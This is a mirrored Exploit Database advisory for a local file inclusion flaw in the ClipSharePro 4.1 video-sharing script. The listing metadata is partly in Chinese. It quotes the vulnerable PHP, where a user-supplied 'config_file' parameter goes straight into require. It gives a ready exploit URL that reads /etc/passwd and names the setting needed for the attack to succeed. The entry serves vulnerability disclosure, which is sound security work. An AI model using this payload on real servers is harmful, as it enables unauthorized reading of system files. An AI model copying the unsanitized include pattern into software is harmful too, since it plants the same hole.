ClipSharePro 4.1 – Local File Inclusion

• Exploit Database
• 42 阅读

• 作者： Saadi Siddiqui
  日期： 2014-03-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/32131/

• # Exploit Title: ClipSharePro <= 4.1 Local File Inclusion
  # Date : 2013/3/9
  # Exploit Author : Saadat Ullah ， saadi_linux[at]rocketmail[dot]com
  # Software Link: http://www.clip-share.com
  # Author HomePage: http://security-geeks.blogspot.com
  # Tested on: Server : Apache/2.2.15 PHP/5.3.3
  
  #Local File Inclusion
  
  ClipsharePro is a paid youtube clone script , suffers from Localfile Inclusion vulnerability through 
  which attacker can include arbitrary file in webapp.
  
  LFI in ubr_link_upload.php
  Poc code
  
  if($MULTI_CONFIGS_ENABLED){
  	if(isset($_GET['config_file']) && strlen($_GET['config_file']) > 0){ $config_file = $_GET['config_file']; }
  	else{ showAlertMessage("<font color='red'>ERROR</font>: Failed to find config_file parameter", 1); }
  }
  else{ $config_file = $DEFAULT_CONFIG; }
  
  // Load config file
  require $config_file;//including arbitrary file $_GET['config_file']
  echo $config_file;
  
  
  The vulnerability can be exploited as..
  http://localhost/clips/ClipSharePro/ubr_link_upload.php?config_file=/etc/passwd
  
  
  For sucessfully exploitation of this vulnerability you need $MULTI_CONFIGS_ENABLED to be 1 in the config file..
  In ubr_ini.php
  
  $MULTI_CONFIGS_ENABLED = 1; --->This value should have to be 1
  
  #Independent Pakistani Security Researcher